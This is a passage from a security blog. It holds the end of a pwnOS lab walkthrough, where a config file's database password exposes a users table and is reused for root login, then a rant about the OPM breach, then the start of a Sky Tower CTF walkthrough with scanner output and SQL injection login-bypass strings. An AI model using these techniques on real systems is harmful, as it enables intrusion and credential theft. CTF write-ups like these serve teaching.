<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">
cat mysqli_connect.php<br /><br />// This file contains the database
access information.<br />// This file also establishes a connection
to MySQL<br />// and selects the database.<br /><br />// Set the
database access information as constants:<br /><br />DEFINE
('DB_USER', 'root');<br />DEFINE ('DB_PASSWORD',
'root@ISIntS');<br />DEFINE ('DB_HOST', 'localhost');<br />DEFINE
('DB_NAME', 'ch16');<br /><br />// Make the connection:<br /><br />$dbc =
@mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die
('Could not connect to MySQL: ' . mysqli_connect_error()
);<br /><br />?>www-data@web:/var$ <br /><br /><br /><br />www-data@web:/var$
mysql -u root<br />mysql -u root<br />ERROR 1045 (28000): Access
denied for user 'root'@'localhost' (using password:
NO)<br />www-data@web:/var$ mysql -u root -proot@ISIntS<br />mysql -u
root -proot@ISIntS<br />Welcome to the MySQL monitor. Commands
end with ; or \g.<br />Your MySQL connection id is 1113<br />Server
version: 5.1.54-1ubuntu4 (Ubuntu)<br /><br />Copyright (c) 2000, 2010,
Oracle and/or its affiliates. All rights reserved.<br />This
software comes with ABSOLUTELY NO WARRANTY. This is free
software,<br />and you are welcome to modify and redistribute it
under the GPL v2 license<br /><br />Type 'help;' or '\h' for help.
Type '\c' to clear the current input statement.<br /><br />mysql>
show databases;<br />show databases;<br />+--------------------+<br />|
Database
|<br />+--------------------+<br />| information_schema |<br />| ch16
|<br />| mysql
|<br />+--------------------+<br />3
rows in set (0.00 sec)<br /><br />mysql> use ch16;<br />use
ch16;<br />Reading table information for completion of table and
column names<br />You can turn off this feature to get a quicker
startup with -A<br /><br />Database changed<br />mysql> show
tables;<br />show tables;<br />+----------------+<br />| Tables_in_ch16
|<br />+----------------+<br />| users
|<br />+----------------+<br />1 row in set (0.00 sec)<br /><br />mysql>
select * from users;<br />select * from
users;<br />+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+<br />|
user_id | first_name | last_name | email
| pass
| user_level | active | registration_date
|<br />+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+<br />|
1 | Dan | Privett
| admin@isints.com |
c2c4b4e51d9e23c02c15702c136c3e950ba9a4af |
0 | NULL | 2011-05-07 17:27:01
|<br />+---------+------------+-----------+------------------+------------------------------------------+------------+--------+---------------------+<br />1
row in set (0.00 sec)<br /><br />mysql> <br /><br />
<br />
</td>
</tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
The db contents could have proven helpful in my conquest, but I gave the credentials a go on the system and boom, good ol'e password reuse strikes again. </div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLetXvnqA2JLhoO_0IDQiz5R6IXKRPN59vjuKAgpSMZp3cKpC9HTv17r4CIWQRxQqueluNKELCcZ-2qoen18VyyF79m6IamJmHV19QYdTNsBYolv2pDZvOGyCBLiTqe4eb6TG1R95T85cf/s1600/Screenshot+from+2015-07-05+14%253A06%253A02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLetXvnqA2JLhoO_0IDQiz5R6IXKRPN59vjuKAgpSMZp3cKpC9HTv17r4CIWQRxQqueluNKELCcZ-2qoen18VyyF79m6IamJmHV19QYdTNsBYolv2pDZvOGyCBLiTqe4eb6TG1R95T85cf/s400/Screenshot+from+2015-07-05+14%253A06%253A02.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Woot, Woot!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
I enjoyed this VM allot, thanks to the guys at http://www.pwnos.com/. I'll keep my eyes open for a Version 3.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
</div>
</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-42661588720782494852015-06-06T20:01:00.000-04:002015-06-08T10:33:15.606-04:00Post OPM Breach Rant<div dir="ltr" style="text-align: left;" trbidi="on">
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<br /></div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;">Like
the majority of cyber security professionals in the world, I can't
help but to reflect on the recent major beach of US government
personnel files from the <span style="font-size: small;">Office
of Personnel Management.</span></span></span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCAL17wXaVuw2-w5lfd16nd41Rmew3y5fNA9OhY8BbUEX_-pttvAQdJ5Il_Mgq6jHRsI9J0zDlKVtxqlYPWBSapSZJEAG02Hsr0kAzCv-_B_vELycJa4mlUVuP6K3E3MP5_-ChlUd9-7Ef/s1600/OPM_logo_insert.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCAL17wXaVuw2-w5lfd16nd41Rmew3y5fNA9OhY8BbUEX_-pttvAQdJ5Il_Mgq6jHRsI9J0zDlKVtxqlYPWBSapSZJEAG02Hsr0kAzCv-_B_vELycJa4mlUVuP6K3E3MP5_-ChlUd9-7Ef/s320/OPM_logo_insert.jpg" width="320" /></a></span></span></span></div>
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><span style="font-size: small;"> </span></span></span>
</div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><span style="font-size: small;">While
the government has made strides towards unifying the security
postures across agencies, with efforts like the DHS Trusted Internet
Connection initiative, as well as advanced technical solutions like
the </span><span style="font-size: small;">EINSTEIN 3
Intrusion Detection System; I feel that a more fundamental form a
remediation is necessary.</span></span></span></div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;">Security
can be compromised by ambiguities and shortcomings in the guiding
standards. A recent <a href="http://www.gao.gov/products/GAO-13-776">GAO
finding pertinent to reports of FISMA compliance</a> associated with
use of the previous version of SP 800-53 indicated disconnects
between FISMA compliance reports and agencies' actual security
posture (<i>M.E Kabay 2009 – <a href="http://www.networkworld.com/article/2252453/compliance/sp-800-53-is-essential-for-security-in-federal-government-it-systems.html">NIST
800-53 is essential in federal government IT systems</a></i>). I'm
here to say that his ambiguity still persists in SP800-53, Revision
4. </span></span>
</div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;">We
(our government's Infosec leaders) need to rework information
security strategy from the ground up, by creating a clear standard
which allows our numerous agencies to elevate their security postures
rather than creatively word-smithing their existing procedures around
unclear security controls. Although not perfect, commercial standards
such as the Payment Card Industry Standard (PCI-DSS version 3.1) have
addressed this issue well. The end result of a PCI assessment
generally leaves the subject knowing 3 things; We have this control
in place, or We do not have this control in place, & finally
we'll have to implement X to become compliant. </span></span>
</div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;">Of
course there are always multiple technical shortcomings that factor
into breaches of this magnitude, however ultimate remediation starts
from the bottom of the stack. The integration of commercial products
and personnel, in the form of government contractors, have long been
a strategy embraced by the federal government. This approach has not
been applied in the development of 800-53, or at least not done well.
Not to totally discredit the standard, it was definitely a forerunner
of the majority of regulatory compliance standards, and implemented
correctly addresses the vast majority of all security risks. However,
I do feel that in this case less may be more. Collectively the NIST
standard is comprised of over 950 individual controls, turning
something that actually isn't rocket science into an exercise which
I'd rather just build a rocket instead of performing. </span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCyiJlTWaSaZ2XoLq8lGcTfMqgng7_DULIe0rGtGEb-OvPlc7hSUtb11O3yw8KlVWOGf-d2GMA0o-3RlvDcozZIlB3AMocM5SLfWccvWZCSbhA4fjlTqXFC0LuGt2ccfTtFjST5hHsS5Uk/s1600/not_rocket_science.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCyiJlTWaSaZ2XoLq8lGcTfMqgng7_DULIe0rGtGEb-OvPlc7hSUtb11O3yw8KlVWOGf-d2GMA0o-3RlvDcozZIlB3AMocM5SLfWccvWZCSbhA4fjlTqXFC0LuGt2ccfTtFjST5hHsS5Uk/s320/not_rocket_science.png" width="320" /></a></span></span></div>
<br />
<div align="left" style="border: none; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<span style="color: #191919;"><span style="font-family: Source Sans Pro, Helvetica Neue, Helvetica, Arial, sans-serif, sans-serif;"><span style="line-height: 160%;">Removing
some of the complexity and red tape which is not aligned to true
risk, will allow agencies, and commercial organizations alike to
concentrate on the basic shortcomings that cyber criminals target and </span><span style="line-height: 25.6000003814697px;">successfully</span><span style="line-height: 160%;"> compromise again, and again....</span></span></span></div>
<div align="left" style="border: none; font-style: normal; font-variant: normal; font-weight: normal; line-height: 160%; margin-bottom: 0.17in; orphans: 1; padding: 0in;">
<br /></div>
</div>
Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com4tag:blogger.com,1999:blog-4508217951330976703.post-82150115338712562442015-05-30T16:41:00.000-04:002015-06-05T22:40:04.527-04:00The Sky Tower Vulnerable VM Walkthrough<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<div style="text-align: left;">
<span style="line-height: 100%;">I recently took on
the challenge to hack the Sky Tower Vulnerable</span><span style="font-family: Liberation Serif, serif; line-height: 100%;"><span style="font-size: 12pt;">
VM. </span></span><span style="line-height: 100%;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: 12pt;">This
CTF was designed by <a href="https://www.telspace.co.za/" target="_blank">Telspace Systems</a> for the CTF at the ITWeb Security Summit and BSidesCPT (Cape Town).
The aim is to test intermediate to advanced security enthusiasts in
their ability to attack a system using a multi-faceted approach and
obtain the "flag".</span></span></span></span></div>
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">As
usual this VM is hosted by the good folks at <a href="http://vulnhub.com/">vulnhub.com</a> with a ton
of other challenges. Here's the approach that I took to gain root
level access to the box:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><b>Enumeration</b></span></span></span></span></span><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">
</span></span></span></span></span></span>
</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# nmap -A 10.1.1.7<br />
<br />
Starting Nmap 6.47 (
http://nmap.org ) at 2015-05-28 20:55 EDT<br />
Nmap scan report for
10.1.1.7<br />
Host is up (0.00084s latency).<br />
Not shown: 997
closed ports<br />
PORT STATE SERVICE VERSION<br />
<b>22/tcp filtered
ssh</b><br />
<b>80/tcp open http Apache httpd 2.2.22
((Debian))</b><br />
|_http-title: Site doesn't have a title
(text/html).<br />
<b>3128/tcp open http-proxy Squid http proxy
3.1.20</b><br />
|_http-methods: No Allow or Public header in OPTIONS
response (status code 400)<br />
|_http-title: ERROR: The requested
URL could not be retrieved<br />
MAC Address: 08:00:27:54:4A:37
(Cadmus Computer Systems)<br />
Device type: general purpose<br />
Running:
Linux 3.X<br />
OS CPE: cpe:/o:linux:linux_kernel:3<br />
OS details:
Linux 3.2 - 3.10<br />
Network Distance: 1 hop<br />
<br />
TRACEROUTE<br />
HOP
RTT ADDRESS<br />
1 0.85 ms 10.1.1.7<br />
<br />
<br /></td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br />
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
The quick glance
shows a filtered SSH service, possible website on port 80, and a
Squid http proxy. Needing more information, I fired up Nikto and
Dirbuster.</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# nikto -h 10.1.1.7<br />
- Nikto
v2.1.6<br />
---------------------------------------------------------------------------<br />
+
Target IP:10.1.1.7<br />
+ Target Hostname: 10.1.1.7<br />
+ Target
Port: 80<br />
+ Start Time: 2015-05-28 21:23:39
(GMT-4)<br />
---------------------------------------------------------------------------<br />
+
Server: Apache/2.2.22 (Debian)<br />
+ Server leaks inodes via ETags,
header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20
07:23:36 2014<br />
+ The anti-clickjacking X-Frame-Options header is
not present.<br />
+ Uncommon header 'tcn' found, with contents:
list<br />
+ Apache mod_negotiation is enabled with MultiViews, which
allows attackers to easily brute force file names. See
http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following
alternatives for 'index' were found: index.html<br />
+ Apache/2.2.22
appears to be outdated (current is at least Apache/2.4.7). Apache
2.0.65 (final release) and 2.2.26 are also current.<br />
+ Allowed
HTTP Methods: POST, OPTIONS, GET, HEAD <br />
+ Retrieved
x-powered-by header: PHP/5.4.4-14+deb7u9<br />
+ OSVDB-3233:
/icons/README: Apache default file found.<br />
<b>+ /login.php: Admin
login page/section found</b>.<br />
+ 7343 requests: 0 error(s) and 9
item(s) reported on remote host<br />
+ End Time: 2015-05-28
21:24:01 (GMT-4) (22
seconds)<br />
---------------------------------------------------------------------------<br />
+
1 host(s) tested<br />
root@kali:~# dirb
http://10.1.1.7<br />
<br />
-----------------<br />
DIRB v2.21 <br />
By The
Dark Raver<br />
-----------------<br />
<br />
START_TIME: Thu May 28
21:25:56 2015<br />
URL_BASE: http://10.1.1.7/<br />
WORDLIST_FILES:
/usr/share/dirb/wordlists/common.txt<br />
<br />
-----------------<br />
<br />
GENERATED
WORDS: 4592 <br />
<br />
---- Scanning URL: http://10.1.1.7/ ----<br />
+
http://10.1.1.7/background (CODE:200|SIZE:2572609)
<br />
+ http://10.1.1.7/cgi-bin/ (CODE:403|SIZE:284)<br />
+
http://10.1.1.7/index (CODE:200|SIZE:1136) <br />
+
http://10.1.1.7/index.html (CODE:200|SIZE:1136) <br />
+
http://10.1.1.7/server-status (CODE:403|SIZE:289)
<br />
-----------------<br />
DOWNLOADED: 4592 - FOUND: 5</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Ok,
looking at these results, I see an outdated version of apache
running, a login.php page which warrants a closer look, sever pages
identified by Dirbuster which are require investigation.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
First let's take a
look at the login.php page. We find a typical form based page which
may be susceptible to Sql Injection:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEietUimv9oZxLnEwiF3JFvb-U978Mzi9DsGX8UYIE2YI73zYjgr9GrjdA8JEbqBFxEREa8qsJs0GXsiwSbEH3P26IZ2U46Hwm1GARmEVzkcVKUakgb3udxYdpxypvYtRqjfMObUAFTyriU1/s1600/Screenshot+from+2015-05-28+21%253A00%253A09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEietUimv9oZxLnEwiF3JFvb-U978Mzi9DsGX8UYIE2YI73zYjgr9GrjdA8JEbqBFxEREa8qsJs0GXsiwSbEH3P26IZ2U46Hwm1GARmEVzkcVKUakgb3udxYdpxypvYtRqjfMObUAFTyriU1/s400/Screenshot+from+2015-05-28+21%253A00%253A09.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Using basic single
quote techniques and such, I'm able to get the system to generate an
overly verbose message revealing the underlying database type:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iFMZ_esrsAToAvXO4nTqmK_5ZMlO9YdAPPrgLGaLNtCD9EKFNDkxf31YDk1Q6b6DcBEQCCdnNrOFOKoC0iScbydN-ml_EIfvuKTsuUp8buLg2RWuqsWP4Nc7L-8R_CqhhAU3IUyUTw7C/s1600/Screenshot+from+2015-05-28+21%253A08%253A40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4iFMZ_esrsAToAvXO4nTqmK_5ZMlO9YdAPPrgLGaLNtCD9EKFNDkxf31YDk1Q6b6DcBEQCCdnNrOFOKoC0iScbydN-ml_EIfvuKTsuUp8buLg2RWuqsWP4Nc7L-8R_CqhhAU3IUyUTw7C/s400/Screenshot+from+2015-05-28+21%253A08%253A40.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
Curious, and wanting
to justify advancing down the Sqli path, I ran Uniscan to verify the
injection point:</div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">root@kali:~# uniscan -u http://10.1.1.7/login.php
-d<br />
####################################<br />
# Uniscan project
#<br />
# http://uniscan.sourceforge.net/
#<br />
####################################<br />
V. 6.2<br />
<br />
<br />
Scan
date: 28-5-2015
22:0:26<br />
=============================================<br />
|
Domain: http://10.1.1.7/login.php/<br />
| Server: Apache/2.2.22
(Debian)<br />
| IP:
10.1.1.7<br />
=============================================<br />
|<br />
|
Crawler Started:<br />
| Plugin name: FCKeditor upload test v.1
Loaded.<br />
| Plugin name: E-mail Detection v.1.1 Loaded.<br />
|
Plugin name: External Host Detect v.1.2 Loaded.<br />
| Plugin name:
Web Backdoor Disclosure v.1.1 Loaded.<br />
| Plugin name: Upload
Form Detect v.1.1 Loaded.<br />
| Plugin name: Code Disclosure v.1.1
Loaded.<br />
| Plugin name: phpinfo() Disclosure v.1 Loaded.<br />
|
Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.<br />
|
[+] Crawling finished, 0 URL's found!<br />
|<br />
| FCKeditor File
Upload:<br />
|<br />
| E-mails:<br />
|<br />
| External hosts:<br />
|<br />
| Web
Backdoors:<br />
|<br />
| File Upload Forms:<br />
|<br />
| Source Code
Disclosure:<br />
|<br />
| PHPinfo() Disclosure:<br />
|<br />
|
Timthumb:<br />
|<br />
| Ignored Files:
<br />
============================================<br />
|
Dynamic tests:<br />
| Plugin name: Learning New Directories v.1.2
Loaded.<br />
| Plugin name: FCKedior tests v.1.1 Loaded.<br />
| Plugin
name: Timthumb <= 1.32 vulnerability v.1 Loaded.<br />
| Plugin
name: Find Backup Files v.1.2 Loaded.<br />
| Plugin name: Blind
SQL-injection tests v.1.3 Loaded.<br />
| Plugin name: Local File
Include tests v.1.1 Loaded.<br />
| Plugin name: PHP CGI Argument
Injection v.1.1 Loaded.<br />
| Plugin name: Remote Command Execution
tests v.1.1 Loaded.<br />
| Plugin name: Remote File Include tests
v.1.2 Loaded.<br />
| Plugin name: SQL-injection tests v.1.2
Loaded.<br />
| Plugin name: Cross-Site Scripting tests v.1.2
Loaded.<br />
| Plugin name: Web Shell Finder v.1.3 Loaded.<br />
| [+]
0 New directories added<br />
<br />
| FCKeditor tests:<br />
<br />
|
Timthumb < 1.33 vulnerability:<br />
<br />
| Backup Files:<br />
<br />
|
Blind SQL Injection:<br />
<br />
| Local File Include:<br />
<br />
| PHP CGI
Argument Injection:<br />
<br />
| Remote Command Execution:<br />
<br />
|
Remote File Include:<br />
| | <br />
| <b>SQL Injection:<br />| [+] Vul
[SQL-i] http://10.1.1.7/login.php<br />| Post data:
&email=123'&password=123 <br />| [+] Vul [SQL-i]
http://10.1.1.7/login.php <br />| Post data:
&email=123&password=123' </b><br />
| Cross-Site Scripting
(XSS):<br />
| <br />
| <br />
| Web Shell
Finder:<br />
====================================<br />
<br />
HTML report saved in:
report/10.1.1.7.html<br />
<br />
<br /></td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">I
attempted multiple Sql Injection login bypass strings to no avail.
Additionally, I fired up the Tamper Data proxy browser plugin to gain
a bit more control over the session.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSTPu6n0KJPMCpl47lim6VMn3H59NR4vQ3Qtrcn7om1DauHOtM_zUSF-0HGYniA8kE6PHiMLR6fSWzeyGp6-IWrO9o8S9KKGxy_-7SKW8UOvKBIhXpjPAoqUUjXyrweoqIByjOZiveE3Li/s1600/Screenshot+from+2015-05-28+23%253A19%253A05.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="181" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSTPu6n0KJPMCpl47lim6VMn3H59NR4vQ3Qtrcn7om1DauHOtM_zUSF-0HGYniA8kE6PHiMLR6fSWzeyGp6-IWrO9o8S9KKGxy_-7SKW8UOvKBIhXpjPAoqUUjXyrweoqIByjOZiveE3Li/s400/Screenshot+from+2015-05-28+23%253A19%253A05.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">Mildly
frustrated, I began a search for common Sql Injection blacklist
bypass techniques. I found lots of information, maybe too much; but
eventually I stumbled upon a awesome whitepaper on the exploit-db
site </span></span></span></span></span></span><a href="https://www.exploit-db.com/papers/17934/" target="_blank">https://www.exploit-db.com/papers/17934/</a><span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">.</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP0fP5dHF0c_RiJEaQE0m8n40Zwp84X_iJfu191A5ZcQn4CkZVo_KyERB_k4lQJvJYG8yWk9yf_dW4KyYj5D6n-M_FXMVlhuewt3dURixLSHpaqOG376cszNJObgtVIgonzwO97wNOEFAX/s1600/Screenshot+from+2015-05-28+23%253A26%253A11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiP0fP5dHF0c_RiJEaQE0m8n40Zwp84X_iJfu191A5ZcQn4CkZVo_KyERB_k4lQJvJYG8yWk9yf_dW4KyYj5D6n-M_FXMVlhuewt3dURixLSHpaqOG376cszNJObgtVIgonzwO97wNOEFAX/s400/Screenshot+from+2015-05-28+23%253A26%253A11.png" width="400" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">From
the whitepaper I extracted this guidance:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<table cellpadding="4" cellspacing="0" style="width: 100%px;">
<colgroup><col width="256*"></col>
</colgroup><tbody>
<tr>
<td style="border: 1px solid #000000; padding: 0.04in;" valign="top" width="100%">Here is a simple bypass using &&, || instead of and, or
respectively. Filtered injection: 1 or 1 = 1 1 and 1 = 1 Bypassed
injection: 1 || 1 = 1 1 && 1 = 1</td>
</tr>
</tbody></table>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<span style="font-variant: normal;"><span style="color: #333333;"><span style="font-family: Liberation Serif, serif;"><span style="font-size: small;"><span style="font-style: normal;"><span style="font-weight: normal;">I
used this new found information to attempt a bypass on the login
page. A bit if additional trial and error, mainly around the proper
terminating comment character (“--” #) got me past the login
page:</span></span></span></span></span></span></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3xlpQFTm6QFLpekXrbLK4hzvKYnoxP2v2rlOQW_862evcUyZVSiaWYAVP-kio6EpAiSqhKCJ-HXiG5qZ6D1goRp85U56P9MdpO68HZ10lyAGwhlOC8LTt1Jrj2OUbnCvY9oOAhLgTEJaS/s1600/Screenshot+from+2015-05-28+23%253A22%253A21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3xlpQFTm6QFLpekXrbLK4hzvKYnoxP2v2rlOQW_862evcUyZVSiaWYAVP-kio6EpAiSqhKCJ-HXiG5qZ6D1goRp85U56P9MdpO68HZ10lyAGwhlOC8LTt1Jrj2OUbnCvY9oOAhLgTEJaS/s400/Screenshot+from+2015-05-28+23%253A22%253A21.png" width="390" /></a></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
<div style="line-height: 100%; margin-bottom: 0in;">
<br /></div>
